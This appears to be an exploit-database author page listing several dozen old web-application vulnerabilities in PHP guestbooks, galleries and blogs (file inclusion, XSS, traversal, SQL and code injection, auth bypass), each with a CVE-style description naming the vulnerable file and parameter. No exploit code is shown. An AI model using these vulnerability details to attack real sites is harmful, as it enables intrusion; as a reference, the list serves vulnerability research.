Dj7xpl

47 exploits Active since May 2005
CVE-2005-2412 EXPLOITDB html WORKING POC
PHP FirstPost - Remote File Inclusion via Include Parameter
PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.
CVE-2007-1479 EXPLOITDB text WORKING POC
Creative Guestbook 1.0 - Cross-Site Scripting in Guestbook.php
Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
CVE-2008-0245 EXPLOITDB php WORKING POC
UploadImage 1.0 - Unauthenticated Privilege Escalation via Password Change
admin.php in UploadImage 1.0 does not check for the original password before making a change to a new password, which allows remote attackers to gain administrator privileges via the pass parameter in a nopass (Set Password) action.
CVE-2007-2167 EXPLOITDB html WORKING POC
aimstats 3.2 - Remote Code Execution via Number Parameter in Update Action
Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action.
CVE-2007-2145 EXPLOITDB perl WORKING POC
MiniGal b13 - Remote Code Execution via Image Comments Input Parameter
The imagecomments function in classes.php in MiniGal b13 allows remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the input parameter. NOTE: some of these details are obtained from third party information.
CVE-2006-0944 EXPLOITDB text WORKING POC
Archangel Weblog 0.90.02 - Auth Bypass
Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1.
EIP-2026-115998 EXPLOITDB perl WORKING POC
Opera 10.10 - Remote Code Execution Denial of Service
CVE-2007-2157 EXPLOITDB text WORKING POC
Zomplog 3.8 - Directory Traversal via File Parameter
Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
EIP-2026-114509 EXPLOITDB php WORKING POC
YaPiG 0.95b - Remote Code Execution
CVE-2007-1487 EXPLOITDB text WORKING POC
Sascha Schroeder WebLog - Directory Traversal via File Parameter in Showarticles Action
Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action.
CVE-2008-0246 EXPLOITDB php WORKING POC
UploadScript 1.0 - Unauthenticated Privilege Escalation via admin.php Pass Parameter
admin.php in UploadScript 1.0 does not check for the original password before making a change to a new password, which allows remote attackers to gain administrator privileges via the pass parameter in a nopass (Set Password) action.
CVE-2007-2715 EXPLOITDB php WORKING POC
Snaps! Gallery 1.4.4 - Unauthenticated Arbitrary Username and Password Change via Admin/users.php
Admin/users.php in Snaps! Gallery 1.4.4 allows remote attackers to change arbitrary usernames and passwords via the (1) username, or the (2) password and password2 parameters in an edit action.
CVE-2007-2642 EXPLOITDB text WRITEUP
R2K Gallery 1.7 - Directory Traversal via lang2 Parameter
Directory traversal vulnerability in galeria.php in R2K Gallery 1.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the lang2 parameter.
CVE-2007-1937 EXPLOITDB python WORKING POC
Scorp Book 1.0 - Remote File Inclusion via smilies.php config Parameter
PHP remote file inclusion vulnerability in smilies.php in Scorp Book 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter.
CVE-2007-2050 EXPLOITDB text WRITEUP
RicarGBooK 1.2.1 - Directory Traversal and Arbitrary File Execution via Lang Cookie or Language Parameter
Multiple directory traversal vulnerabilities in header.php in RicarGBooK 1.2.1 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in (1) a lang cookie or (2) the language parameter.
EIP-2026-111563 EXPLOITDB php WORKING POC
psipuss 1.0 - 'editusers.php' Remote Change Admin Password
CVE-2007-1908 EXPLOITDB text WRITEUP
PHP121 Instant Messenger 2.2 - Remote PHP Code Execution via php121dir Parameter
PHP file inclusion vulnerability in php121db.php in PHP121 Instant Messenger 2.2 allows remote attackers to execute arbitrary PHP code via a UNC share pathname or a local file pathname in the php121dir parameter, which is accessed by the file_exists function.
CVE-2007-4934 EXPLOITDB text WORKING POC
phpFFL 1.24 - Remote Code Execution via PHPFFL_FILE_ROOT Parameter
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) program_files/livedraft/livedraft.php or (2) program_files/livedraft/admin.php.
CVE-2007-2183 EXPLOITDB text WORKING POC
PHP-Ring Webring System 0.9 - SQL Injection via Ring Parameter
SQL injection vulnerability in index.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9 allows remote attackers to execute arbitrary SQL commands via the ring parameter.
CVE-2007-2665 EXPLOITDB html WORKING POC
PhpFirstPost 0.1 - Remote File Inclusion via Include Parameter
PHP remote file inclusion vulnerability in block.php in PhpFirstPost 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the Include parameter.
CVE-2007-1933 EXPLOITDB text WRITEUP
dreamcodes pcp-guestbook 3.0 - Directory Traversal via Lang Parameter
Multiple directory traversal vulnerabilities in PcP-Guestbook (PcP-Book) 3.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to (1) index.php, (2) gb.php, or (3) faq.php.
CVE-2007-2169 EXPLOITDB text WRITEUP
Mozzers SubSystem 1.0 - Code Injection
Static code injection vulnerability in add.php in Mozzers SubSystem 1.0 allows remote attackers to inject PHP code into subs.php via the (1) Sub-name or (2) Sub-url field. NOTE: an earlier report indicated that the add action can be reached through a request to index.php.
CVE-2007-2647 EXPLOITDB php WORKING POC
Monalbum 0.8.7 - Authenticated PHP Code Injection via Admin Configuration Parameters
Static code injection vulnerability in admin/admin_configuration.php in Monalbum 0.8.7 allows remote authenticated users to inject arbitrary PHP code into the conf/config.inc.php file via the (1) gadm_pass, (2) gadm_user, (3) gcfgHote, (4) gcfgPass, (5) gcfgUser, (6) gclassement_rep, (7) gcontour, (8) gfond, (9) ggd_version, (10) ghome, (11) ghor, (12) gimg_copyright, (13) glangage, (14) gmenu_visible, (15) gmini_hasard, (16) gordre_rep, (17) gpage, (18) gracine, (19) grech_inactive, (20) grep_mini, (21) grepertoire, (22) gsite, (23) gslide, (24) gtitre, (25) guse_copyright, (26) gversion, (27) gvert, or (28) gcfgBase parameter.
CVE-2007-2899 EXPLOITDB php WORKING POC
NavBoard 2.6.0 - Remote Code Execution via admin_config.php Parameter Injection
Direct static code injection vulnerability in admin_config.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action.
CVE-2007-5050 EXPLOITDB text WORKING POC
Neuron News 1.0 - Path Traversal via q Parameter
Directory traversal vulnerability in index.php in Neuron News 1.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the q parameter.